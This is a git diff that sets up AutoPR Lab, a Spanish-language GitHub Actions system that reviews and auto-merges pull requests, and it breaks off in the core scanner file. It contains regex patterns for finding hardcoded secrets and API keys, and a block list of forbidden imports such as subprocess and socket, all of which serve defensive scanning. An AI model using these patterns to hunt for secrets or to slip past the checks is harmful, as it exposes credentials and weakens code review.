diff --git a/.dockerignore b/.dockerignore new file mode 100644 index 0000000..9d044b2 --- /dev/null +++ b/.dockerignore @@ -0,0 +1,37 @@ +# Git and version control +.git +.github +.gitignore + +# Python artifacts +__pycache__/ +*.py[cod] +*$py.class +.pytest_cache/ +.mypy_cache/ +.ruff_cache/ +.venv/ +venv/ +ENV/ +build/ +dist/ +*.egg-info/ + +# Coverage and reports +.coverage +htmlcov/ +nosetests.xml +coverage.xml +*.lcov +safety-report.json +bandit-report.json +scan_result.json +security-scan.json + +# IDEs +.vscode/ +.idea/ + +# OS files +.DS_Store +Thumbs.db diff --git a/.github/workflows/auto-pr.yml b/.github/workflows/auto-pr.yml new file mode 100644 index 0000000..f5f697b --- /dev/null +++ b/.github/workflows/auto-pr.yml @@ -0,0 +1,144 @@ +name: "🤖 AutoPR Lab — Automated PR Review" + +# ───────────────────────────────────────────────────────────────────────────── +# Este workflow se activa en cada Pull Request y toma decisiones automáticas: +# - ✅ MERGE: Si el PR pasa todos los análisis de seguridad +# - ⚠️ WARN MERGE: Si hay advertencias no críticas +# - ❌ REJECT: Si hay errores críticos o violaciones de seguridad +# ───────────────────────────────────────────────────────────────────────────── + +on: + pull_request: + types: [opened, synchronize, reopened] + # Filtro opcional: solo activar para ciertos paths + # paths: + # - "detectors/**" + # - "tests/**" + # - "docs/**" + +# Cancelar workflows anteriores del mismo PR cuando se hace push nuevo +concurrency: + group: autopr-${{ github.event.pull_request.number }} + cancel-in-progress: true + +jobs: + autopr-analysis: + name: "🔍 Security & Quality Analysis" + runs-on: ubuntu-latest + timeout-minutes: 10 + + # Permisos explícitos — principio de mínimo privilegio + permissions: + contents: write # Necesario para hacer merge + pull-requests: write # Necesario para comentar, aprobar y cerrar PRs + issues: write # Necesario para agregar labels + + steps: + # ── 1. Checkout del repositorio ────────────────────────────────── + - name: "📥 Checkout Repository" + uses: actions/checkout@v5 + with: + fetch-depth: 0 # Necesario para comparar branches + + # ── 2. Setup Python ────────────────────────────────────────────── + - name: "🐍 Setup Python 3.13" + uses: actions/setup-python@v5 + with: + python-version: "3.13" + cache: "pip" + + # ── 3. Instalar dependencias ───────────────────────────────────── + - name: "📦 Install Dependencies" + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + # ── 4. Validación de seguridad previa ──────────────────────────── + - name: "🛡️ Pre-flight Security Check" + run: | + echo "PR Author: ${{ github.event.pull_request.user.login }}" + echo "PR Title: ${{ github.event.pull_request.title }}" + echo "Base Branch: ${{ github.event.pull_request.base.ref }}" + echo "Head Branch: ${{ github.event.pull_request.head.ref }}" + echo "Changed Files Count: ${{ github.event.pull_request.changed_files }}" + echo "Additions: ${{ github.event.pull_request.additions }}" + echo "Deletions: ${{ github.event.pull_request.deletions }}" + + # Validar que el PR viene de un fork (seguridad adicional) + # Para repos privados, puedes quitar esta validación + echo "Repository: ${{ github.repository }}" + echo "Head Repository: ${{ github.event.pull_request.head.repo.full_name }}" + + # ── 5. Ejecutar Decision Engine ─────────────────────────────────── + - name: "🤖 Run AutoPR Decision Engine" + id: autopr + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GITHUB_REPOSITORY: ${{ github.repository }} + PR_NUMBER: ${{ github.event.pull_request.number }} + LOG_LEVEL: "INFO" + SCAN_OUTPUT: "scan_result.json" + # Activar DRY_RUN=true para probar sin ejecutar acciones reales + # DRY_RUN: "true" + run: | + python scripts/decision_engine.py + + # ── 6. Publicar resultado como artefacto ───────────────────────── + - name: "📊 Upload Scan Results" + if: always() + uses: actions/upload-artifact@v4 + with: + name: "scan-results-pr-${{ github.event.pull_request.number }}" + path: scan_result.json + retention-days: 30 + + # ── 7. Summary del workflow ─────────────────────────────────────── + - name: "📋 Generate Workflow Summary" + if: always() + run: | + if [ -f scan_result.json ]; then + DECISION=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('decision','UNKNOWN'))") + STATUS=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('global_status','UNKNOWN'))") + ERRORS=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('errors',0))") + WARNINGS=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('warnings',0))") + FILES=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('files_analyzed',0))") + + cat >> $GITHUB_STEP_SUMMARY << EOF + ## 🤖 AutoPR Lab — PR #${{ github.event.pull_request.number }} + + | Campo | Valor | + |-------|-------| + | Decisión | \`${DECISION}\` | + | Estado | \`${STATUS}\` | + | Errores | \`${ERRORS}\` | + | Advertencias | \`${WARNINGS}\` | + | Archivos analizados | \`${FILES}\` | + + EOF + + if [ "$DECISION" = "MERGE" ]; then + echo "### ✅ PR mergeado automáticamente" >> $GITHUB_STEP_SUMMARY + elif [ "$DECISION" = "WARN_MERGE" ]; then + echo "### ⚠️ PR mergeado con advertencias" >> $GITHUB_STEP_SUMMARY + elif [ "$DECISION" = "REJECT" ]; then + echo "### ❌ PR rechazado y cerrado" >> $GITHUB_STEP_SUMMARY + fi + else + echo "## ⚠️ No se generó resultado de análisis" >> $GITHUB_STEP_SUMMARY + fi + + # ── 8. Fallar el job si el PR fue rechazado ─────────────────────── + # (El script ya devuelve exit code 1 en REJECT, pero esto es explícito) + - name: "🚦 Check Final Decision" + if: always() + run: | + if [ -f scan_result.json ]; then + DECISION=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('decision','UNKNOWN'))") + if [ "$DECISION" = "REJECT" ]; then + echo "❌ PR fue rechazado por AutoPR Lab" + exit 1 + elif [ "$DECISION" = "MERGE" ] || [ "$DECISION" = "WARN_MERGE" ]; then + echo "✅ PR fue procesado exitosamente: ${DECISION}" + exit 0 + fi + fi diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml new file mode 100644 index 0000000..5abb21f --- /dev/null +++ b/.github/workflows/security.yml @@ -0,0 +1,241 @@ +name: "🔒 Security Scan" + +# ───────────────────────────────────────────────────────────────────────────── +# Workflow de escaneo de seguridad periódico y bajo demanda +# Se ejecuta automáticamente cada lunes a las 2am UTC y puede ser disparado manualmente +# ───────────────────────────────────────────────────────────────────────────── + +on: + schedule: + - cron: "0 2 * * 1" # Lunes 2am UTC + workflow_dispatch: + inputs: + scan_type: + description: 'Tipo de escaneo' + required: false + default: 'full' + type: choice + options: + - basic + - full + +jobs: + security-scan: + name: "🛡️ Security Vulnerability Scan" + runs-on: ubuntu-latest + timeout-minutes: 15 + + # Permisos mínimos necesarios + permissions: + contents: read # Leer el repositorio + actions: read # Leer workflows + security-events: write # Crear alerts de seguridad (opcional) + + steps: + # ── 1. Checkout del repositorio ────────────────────────────────── + - name: "📥 Checkout Repository" + uses: actions/checkout@v5 + + # ── 2. Setup Python ────────────────────────────────────────────── + - name: "🐍 Setup Python 3.13" + uses: actions/setup-python@v5 + with: + python-version: "3.13" + cache: "pip" + + # ── 3. Instalar dependencias de seguridad ──────────────────────── + - name: "📦 Install Security Tools" + run: | + python -m pip install --upgrade pip + pip install safety>=3.0.0 bandit>=1.7.0 + + # ── 4. Escaneo con Safety (vulnerabilidades en dependencias) ───── + - name: "🔍 Safety Scan - Dependencies Vulnerabilities" + id: safety + run: | + echo "🔒 Escaneando vulnerabilidades en dependencias..." + + # Crear requirements temporal si no existe + if [ ! -f requirements.txt ]; then + echo "# AutoPR Lab - Dependencies" > requirements.txt + echo "# Solo usa módulos de la biblioteca estándar de Python 3.10+" >> requirements.txt + fi + + # Ejecutar safety scan + python -m safety scan --json --output safety-report.json || true + + # Extraer resumen + if [ -f safety-report.json ]; then + VULNS=$(python -c " +import json +try: + with open('safety-report.json', 'r') as f: + data = json.load(f) + vulns = len(data.get('vulnerabilities', [])) + print(vulns) +except: + print('0') +") + echo "vulnerabilities_found=$VULNS" >> $GITHUB_OUTPUT + echo "📊 Vulnerabilidades encontradas: $VULNS" + else + echo "vulnerabilities_found=0" >> $GITHUB_OUTPUT + fi + + # ── 5. Escaneo con Bandit (análisis estático de código) ───────────── + - name: "🔍 Bandit Scan - Static Code Analysis" + id: bandit + run: | + echo "🔍 Analizando código fuente en busca de problemas de seguridad..." + + # Ejecutar bandit scan + python -m bandit -r . -f json -o bandit-report.json || true + + # Extraer resumen + if [ -f bandit-report.json ]; then + ISSUES=$(python -c " +import json +try: + with open('bandit-report.json', 'r') as f: + data = json.load(f) + issues = len(data.get('results', [])) + high_low = len([r for r in data.get('results', []) if r.get('issue_severity') in ['HIGH', 'MEDIUM']]) + print(f'{issues}:{high_low}') +except: + print('0:0') +") + TOTAL_ISSUES=$(echo $ISSUES | cut -d':' -f1) + HIGH_MEDIUM=$(echo $ISSUES | cut -d':' -f2) + + echo "total_issues=$TOTAL_ISSUES" >> $GITHUB_OUTPUT + echo "high_medium_issues=$HIGH_MEDIUM" >> $GITHUB_OUTPUT + echo "📊 Problemas de seguridad encontrados: $TOTAL_ISSUES ($HIGH_MEDIUM altos/medios)" + else + echo "total_issues=0" >> $GITHUB_OUTPUT + echo "high_medium_issues=0" >> $GITHUB_OUTPUT + fi + + # ── 6. Análisis de secretos (opcional) ─────────────────────────────── + - name: "🔍 Secret Scan - Basic Pattern Detection" + id: secrets + run: | + echo "🔍 Buscando patrones de secretos comunes..." + + # Patrones básicos de secretos + PATTERNS=( + "password\s*=\s*['\"][^'\"]+['\"]" + "api[_-]?key\s*=\s*['\"][^'\"]+['\"]" + "secret[_-]?key\s*=\s*['\"][^'\"]+['\"]" + "token\s*=\s*['\"][^'\"]{20,}['\"]" + "sk-[a-zA-Z0-9]{48}" + ) + + SECRETS_FOUND=0 + for pattern in "${PATTERNS[@]}"; do + if grep -r -E --include="*.py" --include="*.yml" --include="*.yaml" --include="*.json" --include="*.md" "$pattern" .; then + ((SECRETS_FOUND++)) + fi + done + + echo "secrets_found=$SECRETS_FOUND" >> $GITHUB_OUTPUT + echo "📊 Posibles secretos encontrados: $SECRETS_FOUND" + + # ── 7. Generar reporte consolidado ─────────────────────────────────── + - name: "📊 Generate Security Report" + run: | + cat << 'EOF' > security-summary.md + # 🔒 AutoPR Lab - Security Scan Report + + ## 📊 Resumen Ejecutivo + + | Métrica | Resultado | + |---------|-----------| + | Vulnerabilidades en dependencias | ${{ steps.safety.outputs.vulnerabilities_found }} | + | Problemas de código (total) | ${{ steps.bandit.outputs.total_issues }} | + | Problemas críticos/altos | ${{ steps.bandit.outputs.high_medium_issues }} | + | Posibles secretos | ${{ steps.secrets.outputs.secrets_found }} | + + ## 🕐 Fecha del Escaneo + $(date -u +"%Y-%m-%d %H:%M:%S UTC") + + ## 📋 Detalles + + ### Dependencias + - **Safety**: Escaneo completado + - **Reporte**: [safety-report.json](safety-report.json) + + ### Código Fuente + - **Bandit**: Análisis estático completado + - **Reporte**: [bandit-report.json](bandit-report.json) + + ### Secretos + - **Pattern Detection**: Escaneo básico completado + - **Método**: Búsqueda de patrones comunes + + --- + *Generado automáticamente por AutoPR Lab Security Workflow* + EOF + + echo "📄 Reporte de seguridad generado: security-summary.md" + + # ── 8. Publicar artefactos ─────────────────────────────────────────── + - name: "📦 Upload Security Reports" + if: always() + uses: actions/upload-artifact@v4 + with: + name: "security-scan-${{ github.run_number }}" + path: | + safety-report.json + bandit-report.json + security-summary.md + retention-days: 90 + + # ── 9. Publicar summary en GitHub ───────────────────────────────── + - name: "📋 Publish Security Summary" + if: always() + run: | + cat security-summary.md >> $GITHUB_STEP_SUMMARY + echo "" + echo "## 🚦 Estado General" + + VULNS="${{ steps.safety.outputs.vulnerabilities_found }}" + HIGH_ISSUES="${{ steps.bandit.outputs.high_medium_issues }}" + SECRETS="${{ steps.secrets.outputs.secrets_found }}" + + if [ "$VULNS" -eq 0 ] && [ "$HIGH_ISSUES" -eq 0 ] && [ "$SECRETS" -eq 0 ]; then + echo "### ✅ Sin problemas críticos detectados" + else + echo "### ⚠️ Se encontraron problemas que requieren atención" + if [ "$VULNS" -gt 0 ]; then + echo "- 🔴 $VULNS vulnerabilidades en dependencias" + fi + if [ "$HIGH_ISSUES" -gt 0 ]; then + echo "- 🟡 $HIGH_ISSUES problemas de seguridad en el código" + fi + if [ "$SECRETS" -gt 0 ]; then + echo "- 🔴 $SECRETS posibles secretos expuestos" + fi + fi + + # ── 10. Verificación crítica (fallar si hay problemas graves) ──────── + - name: "🚦 Critical Security Check" + if: always() + run: | + VULNS="${{ steps.safety.outputs.vulnerabilities_found }}" + HIGH_ISSUES="${{ steps.bandit.outputs.high_medium_issues }}" + SECRETS="${{ steps.secrets.outputs.secrets_found }}" + + # Considerar crítico: vulnerabilidades conocidas o secretos expuestos + if [ "$VULNS" -gt 0 ] || [ "$SECRETS" -gt 0 ]; then + echo "❌ Se detectaron problemas críticos de seguridad" + echo "📊 Vulnerabilidades: $VULNS" + echo "📊 Secretos: $SECRETS" + exit 1 + elif [ "$HIGH_ISSUES" -gt 5 ]; then + echo "⚠️ Se detectaron múltiples problemas de seguridad" + echo "📊 Problemas altos/medios: $HIGH_ISSUES" + exit 1 + else + echo "✅ No se detectaron problemas críticos de seguridad" + exit 0 + fi diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..93b4335 --- /dev/null +++ b/.gitignore @@ -0,0 +1,181 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +.python-version + +# pipenv +Pipfile.lock + +# poetry +poetry.lock + +# pdm +.pdm.toml + +# PEP 582 +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +.idea/ + +# VS Code +.vscode/ +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +!.vscode/*.code-snippets + +# Local History for Visual Studio Code +.history/ + +# Built Visual Studio Code Extensions +*.vsix + +# OS-specific +.DS_Store +.DS_Store? +._* +.Spotlight-V100 +.Trashes +ehthumbs.db +Thumbs.db + +# AutoPR Lab specific +scan_result.json +*.log +safety-report.json +security-scan.json +artifacts/ + +# Temporary files +*.tmp +*.temp +*.swp +*.swo +*~ + +# Backup files +*.bak +*.backup +*.orig diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml new file mode 100644 index 0000000..410763f --- /dev/null +++ b/.pre-commit-config.yaml @@ -0,0 +1,27 @@ +# Pre-commit configuration for AutoPR-Lab +# See https://pre-commit.com for more information +# See https://pre-commit.com/hooks.html for more hooks + +repos: + - repo: https://github.com/pre-commit/pre-commit-hooks + rev: v4.6.0 + hooks: + - id: trailing-whitespace + - id: end-of-file-fixer + - id: check-yaml + - id: check-added-large-files + - id: check-toml + + - repo: https://github.com/astral-sh/ruff-pre-commit + rev: v0.9.9 + hooks: + - id: ruff + args: [--fix, --exit-non-zero-on-fix] + - id: ruff-format + + - repo: https://github.com/pre-commit/mirrors-mypy + rev: v1.11.2 + hooks: + - id: mypy + additional_dependencies: [types-requests, types-setuptools] + args: [--strict, --ignore-missing-imports] diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..213fdb0 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,33 @@ +# Use high performance, lightweight Python 3.13 image +FROM python:3.13-slim-bookworm + +# Metadata +LABEL maintainer="AutoPR Lab Team" +LABEL version="1.0" +LABEL description="AutoPR Lab Decision Engine" + +# Environment variables +ENV PYTHONUNBUFFERED=1 \ + PYTHONDONTWRITEBYTECODE=1 \ + PIP_NO_CACHE_DIR=off \ + PIP_DISABLE_PIP_VERSION_CHECK=on \ + PIP_DEFAULT_TIMEOUT=100 + +# Set working directory +WORKDIR /app + +# Copy dependency files +COPY pyproject.toml requirements.txt ./ + +# Install the package and its dependencies +RUN pip install --upgrade pip && \ + pip install . + +# Copy the rest of the application +COPY . . + +# Ensure scripts directory is in PATH +ENV PYTHONPATH="/app:${PYTHONPATH}" + +# Define the default entrypoint +ENTRYPOINT ["python", "scripts/decision_engine.py"] diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..73ec295 --- /dev/null +++ b/Makefile @@ -0,0 +1,114 @@ +.PHONY: help install install-dev test lint format clean security-check security-scan run-example validate-detectors + +# Default target +help: + @echo "AutoPR Lab - Makefile" + @echo "=====================" + @echo "" + @echo "Disponibles:" + @echo " install - Instalar el paquete en modo edición" + @echo " install-dev - Instalar dependencias de desarrollo" + @echo " test - Ejecutar tests con cobertura" + @echo " lint - Ejecutar linting (ruff + mypy)" + @echo " format - Formatear código con ruff" + @echo " clean - Limpiar archivos temporales" + @echo " security-check- Escaneo de seguridad básico" + @echo " security-scan - Escaneo de seguridad completo" + @echo " run-example - Ejecutar ejemplo del decision engine" + @echo " validate-detectors - Validar estructura de detectores" + @echo "" + +# Install package in development mode +install: + pip install -e . + +# Install with development dependencies +install-dev: + pip install -e ".[dev,security]" + @echo "✅ Dependencias de desarrollo instaladas" + +# Run tests with coverage +test: + @echo "🧪 Ejecutando tests..." + python -m pytest tests/ -v --cov=. --cov-report=html --cov-report=term + @echo "✅ Tests completados. Ver reporte en htmlcov/index.html" + +# Linting with ruff and mypy +lint: + @echo "🔍 Ejecutando linting..." + ruff check . + mypy . + @echo "✅ Linting completado" + +# Format code with ruff +format: + @echo "📝 Formateando código..." + ruff format . + @echo "✅ Código formateado" + +# Clean temporary files and build artifacts +clean: + @echo "🧹 Limpiando archivos temporales..." + find . -type d -name __pycache__ -delete 2>/dev/null || true + find . -type f -name "*.pyc" -delete 2>/dev/null || true + find . -type f -name "*.pyo" -delete 2>/dev/null || true + find . -type d -name "*.egg-info" -exec rm -rf {} + 2>/dev/null || true + find . -type d -name "*.egg" -exec rm -rf {} + 2>/dev/null || true + rm -rf .coverage htmlcov/ .pytest_cache/ .mypy_cache/ .ruff_cache/ + rm -rf build/ dist/ + rm -f scan_result.json safety-report.json security-scan.json + @echo "✅ Limpieza completada" + +# Basic security check +security-check: + @echo "🔒 Ejecitando verificación de seguridad básica..." + python -m safety scan --short-report + @echo "✅ Verificación de seguridad completada" + +# Full security scan +security-scan: + @echo "🛡️ Ejecitando escaneo de seguridad completo..." + python -m safety scan --json --output safety-report.json + python -m bandit -r . -f json -o bandit-report.json || true + @echo "✅ Escaneo de seguridad completado" + @echo "📊 Reportes generados: safety-report.json, bandit-report.json" + +# Run example with decision engine +run-example: + @echo "🤖 Ejecutando ejemplo del decision engine..." + @if [ -z "$(GITHUB_TOKEN)" ] || [ -z "$(GITHUB_REPOSITORY)" ] || [ -z "$(PR_NUMBER)" ]; then \ + echo "❌ Se requieren variables de entorno:"; \ + echo " GITHUB_TOKEN, GITHUB_REPOSITORY, PR_NUMBER"; \ + echo " Ejemplo: make run-example GITHUB_TOKEN=xxx GITHUB_REPOSITORY=owner/repo PR_NUMBER=123"; \ + exit 1; \ + fi + export DRY_RUN="true" && python scripts/decision_engine.py + +# Validate all detectors +validate-detectors: + @echo "🔍 Validando estructura de detectores..." + python scripts/validate_detectors.py + +# Development setup (install + validate) +setup: install-dev validate-detectors + @echo "🚀 Entorno de desarrollo configurado" + +# Pre-commit checks (used by CI) +pre-commit: lint test security-check + @echo "✅ Verificaciones pre-commit completadas" + +# Quick development cycle +dev: format lint test + @echo "🔄 Ciclo de desarrollo completado" + +# Check for outdated dependencies +outdated: + @echo "📦 Verificando dependencias desactualizadas..." + pip list --outdated + +# Update dependencies +update: + @echo "⬆️ Actualizando dependencias..." + pip install --upgrade pip setuptools wheel + pip install --upgrade -e ".[dev,security]" + @echo "✅ Dependencias actualizadas" diff --git a/README.md b/README.md index da14715..93f19d6 100644 --- a/README.md +++ b/README.md @@ -1,31 +1,293 @@ -# pull-shark-test +# 🤖 AutoPR Lab -Test 1 +> **Sistema de revisión y merge automático de Pull Requests con análisis de seguridad integrado.** +> Cero intervención humana. Reglas estrictas. Decisiones trazables. -Test 2 +[![GitHub Actions](https://img.shields.io/badge/GitHub_Actions-2088FF?style=flat&logo=github-actions&logoColor=white)](https://github.com/features/actions) +[![Python 3.10+](https://img.shields.io/badge/Python-3.10%2B-blue?logo=python)](https://python.org) +[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) +[![Security: Automated](https://img.shields.io/badge/Security-Automated-red)](docs/security.md) -Test 3 +--- -Test 4 +## ¿Qué es AutoPR Lab? -Test 5 +AutoPR Lab es un sistema de **revisión automática de Pull Requests** construido sobre GitHub Actions y Python. Analiza cada PR en tiempo real, ejecuta detectores de seguridad modulares, y toma una de tres decisiones sin intervención humana: -Test 6 +| Decisión | Condición | Acción | +|----------|-----------|--------| +| ✅ **MERGE** | Sin problemas | Aprueba + merge automático | +| ⚠️ **WARN MERGE** | Solo advertencias | Aprueba + merge + comentario | +| ❌ **REJECT** | Errores críticos | Comenta problemas + cierra PR | -Test 7 +--- -Test 8 +## 🏗️ Arquitectura del Proyecto -Test 9 +``` +AutoPR-Lab/ +│ +├── .github/ +│ └── workflows/ +│ └── auto-pr.yml # Workflow principal de GitHub Actions +│ +├── core/ +│ ├── __init__.py +│ └── scanner.py # Motor principal de análisis +│ +├── detectors/ +│ ├── __init__.py # Auto-descubrimiento de detectores +│ ├── base_detector.py # Clase base abstracta (contrato) +│ ├── api_keys_detector.py # Detecta API keys y tokens +│ ├── passwords_detector.py # Detecta passwords hardcodeados +│ ├── sensitive_files_detector.py # Detecta archivos sensibles +│ └── detector_validator.py # Valida estructura de detectores nuevos +│ +├── utils/ +│ ├── __init__.py +│ ├── github_api.py # Cliente de la GitHub REST API +│ ├── comment_templates.py # Templates para comentarios del bot +│ └── logger.py # Sistema de logging con colores +│ +├── scripts/ +│ └── decision_engine.py # Entry point: orquesta todo el flujo +│ +├── tests/ +│ ├── test_detectors.py # Tests unitarios de detectores +│ └── test_scanner.py # Tests de integración del scanner +│ +├── docs/ +│ ├── how-to-add-detector.md # Guía para contributors +│ └── example-outputs.md # Ejemplos de outputs del sistema +│ +├── examples/ +│ ├── valid-pr/ # Ejemplos de PRs que serán aceptados +│ └── invalid-pr/ # Ejemplos de PRs que serán rechazados +│ +└── requirements.txt # Dependencias (solo stdlib de Python) +``` -Test 10 +--- -Test 11 +## 🔍 Sistema de Detectores -Test 12 +Los detectores son módulos **independientes** que analizan el código y devuelven resultados estandarizados: -Test 13 +```python +@dataclass +class DetectorResult: + status: DetectorStatus # OK | WARNING | ERROR + detector_name: str + message: str + details: List[str] + file_path: Optional[str] + line_number: Optional[int] +``` -Test 14 +### Detectores incluidos -Test 15 +| Detector | Qué detecta | Severidad | +|----------|-------------|-----------| +| `APIKeysDetector` | GitHub tokens, OpenAI keys, AWS secrets, claves RSA, URLs con credenciales | 🔴 Critical | +| `PasswordsDetector` | Passwords hardcodeados, contraseñas triviales, tokens de autenticación | 🔴 Critical | +| `SensitiveFilesDetector` | `.env`, `.pem`, `.key`, `credentials.json`, archivos de BD | 🔴 Critical | +| `DetectorFormatValidator` | Estructura, imports prohibidos, `eval/exec`, herencia correcta | 🔴 Critical | + +--- + +## 🛡️ Reglas de Seguridad (Auto-Merge) + +El sistema solo permite merge automático cuando se cumplen **TODAS** estas condiciones: + +### ✅ Rutas permitidas para auto-merge +``` +detectors/ ← Nuevos detectores +tests/ ← Tests +docs/ ← Documentación +examples/ ← Ejemplos +README.md ← Readme principal +``` + +### 🚫 Rutas siempre bloqueadas +``` +core/ ← Motor principal (requiere revisión manual) +.github/workflows/ ← Workflows de CI/CD (crítico) +scripts/ ← Scripts de decisión +requirements.txt ← Dependencias +pyproject.toml ← Configuración del proyecto +Makefile ← Automatización +``` + +### 📏 Límites de tamaño +- Máximo **10 archivos** por PR +- Máximo **500 líneas** cambiadas + +--- + +## ⚡ Cómo Funciona (Flujo Completo) + +``` +PR Abierto/Actualizado + │ + ▼ +┌─────────────────────────────────┐ +│ GitHub Actions Trigger │ +│ on: pull_request │ +└─────────────┬───────────────────┘ + │ + ▼ +┌─────────────────────────────────┐ +│ decision_engine.py │ +│ - Lee variables de entorno │ +│ - Obtiene archivos del PR │ +└─────────────┬───────────────────┘ + │ + ▼ +┌─────────────────────────────────┐ +│ SecurityRules.validate_paths │ +│ - ¿Rutas permitidas? │ +│ - ¿Tamaño dentro de límites? │ +└─────────────┬───────────────────┘ + │ + ▼ +┌─────────────────────────────────┐ +│ Scanner.scan_pr │ +│ - Ejecuta TODOS los │ +│ detectores sobre cada │ +│ archivo del PR │ +└─────────────┬───────────────────┘ + │ + ┌─────────┼──────────┐ + ▼ ▼ ▼ + ERROR WARNING OK + │ │ │ + ▼ ▼ ▼ + REJECT WARN_MERGE MERGE + │ │ │ + ▼ ▼ ▼ +Comentar Aprobar Aprobar + + Cerrar + Merge + Merge + + Comentar +``` + +--- + +## 🚀 Instalación y Configuración + +### 1. Fork o clona el repositorio + +```bash +git clone https://github.com/devsebastian44/AutoPR-Lab.git +cd AutoPR-Lab +``` + +### 2. Habilitar GitHub Actions + +El workflow en `.github/workflows/auto-pr.yml` se activa automáticamente en cada PR. + +**No necesitas configurar nada adicional** — usa el `GITHUB_TOKEN` que GitHub provee automáticamente. + +### 3. Configurar permisos del repositorio + +En `Settings → Actions → General`: +- Marcar **"Read and write permissions"** para el GITHUB_TOKEN +- Marcar **"Allow GitHub Actions to create and approve pull requests"** + +### 4. Opcional: Ejecutar localmente + +```bash +# Instalar dependencias (solo para desarrollo) +pip install -r requirements.txt + +# Ejecutar tests +python -m pytest tests/ -v + +# Dry run (sin ejecutar acciones reales en GitHub) +export GITHUB_TOKEN="tu_token" +export GITHUB_REPOSITORY="owner/repo" +export PR_NUMBER="123" +export DRY_RUN="true" +python scripts/decision_engine.py +``` + +--- + +## 🔌 Agregar un Detector Nuevo + +1. Crea `/detectors/mi_detector.py` heredando de `BaseDetector` +2. Crea `/tests/test_mi_detector.py` con tests unitarios +3. Abre un PR — **AutoPR Lab lo revisará y mergeará automáticamente** si está bien formado + +```python +# detectors/mi_detector.py +from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus +from typing import List + +class MiDetector(BaseDetector): + @property + def name(self) -> str: + return "MiDetector" + + @property + def description(self) -> str: + return "Detecta X en el código" + + @property + def severity(self) -> str: + return "high" # critical | high | medium | low + + def analyze(self, file_path: str, content: str) -> List[DetectorResult]: + results = [] + # Tu lógica aquí... + return results +``` + +Ver guía completa: [docs/how-to-add-detector.md](docs/how-to-add-detector.md) + +--- + +## 📊 Ejemplo de Output + +### PR Rechazado (con API key) + +``` +❌ [ERROR] APIKeysDetector: Posible OpenAI API Key detectado + - Patrón detectado: sk-ab****ijk (detectors/bad.py, línea 5) + +❌ [ERROR] PasswordsDetector: Password hardcodeado en 'DATABASE_PASSWORD' + - Variable: DATABASE_PASSWORD (config.py, línea 12) + +DECISIÓN: REJECT +→ PR comentado y cerrado automáticamente +``` + +### PR Aprobado (detector limpio) + +``` +✅ [OK] DetectorFormatValidator: Estructura del detector válida +✅ [OK] APIKeysDetector: Sin credenciales detectadas +✅ [OK] PasswordsDetector: Sin passwords hardcodeados +✅ [OK] SensitiveFilesDetector: Sin archivos sensibles + +DECISIÓN: MERGE +→ PR aprobado y mergeado automáticamente en 89ms +``` + +Ver más ejemplos: [docs/example-outputs.md](docs/example-outputs.md) + +--- + +## 🔒 Modelo de Seguridad + +### Protección contra abuso +- **Validación de paths**: Solo archivos en rutas explícitamente permitidas +- **Análisis estático de AST**: Los detectores nuevos son analizados con `ast.parse()` antes de ser aceptados +- **Imports prohibidos**: `subprocess`, `socket`, `requests`, `eval`, `exec` son bloqueados automáticamente +- **Límites de tamaño**: PRs grandes requieren revisión manual +- **Sin ejecución de código**: Los detectores NUNCA ejecutan el código que analizan, solo lo leen como texto + +### Qué requiere revisión manual +Cualquier cambio en estas áreas **nunca se auto-mergea**: +- El motor de decisión (`core/`, `scripts/`) +- Los workflows de GitHub Actions +- Las dependencias del proyecto diff --git a/core/__init__.py b/core/__init__.py new file mode 100644 index 0000000..8a3607c --- /dev/null +++ b/core/__init__.py @@ -0,0 +1,5 @@ +"""AutoPR Lab - Core Package""" + +from core.scanner import Scanner, ScanResult, SecurityRules + +__all__ = ["Scanner", "ScanResult", "SecurityRules"] diff --git a/core/scanner.py b/core/scanner.py new file mode 100644 index 0000000..908a88e --- /dev/null +++ b/core/scanner.py @@ -0,0 +1,271 @@ +""" +AutoPR Lab - Core Scanner +=========================== +Motor principal de análisis de Pull Requests. +Orquesta todos los detectores y genera el reporte final. +""" + +import json +import time +from dataclasses import asdict, dataclass, field +from typing import Any + +from detectors import discover_detectors +from detectors.base_detector import DetectorResult, DetectorStatus +from utils.logger import get_logger + +logger = get_logger("scanner") + + 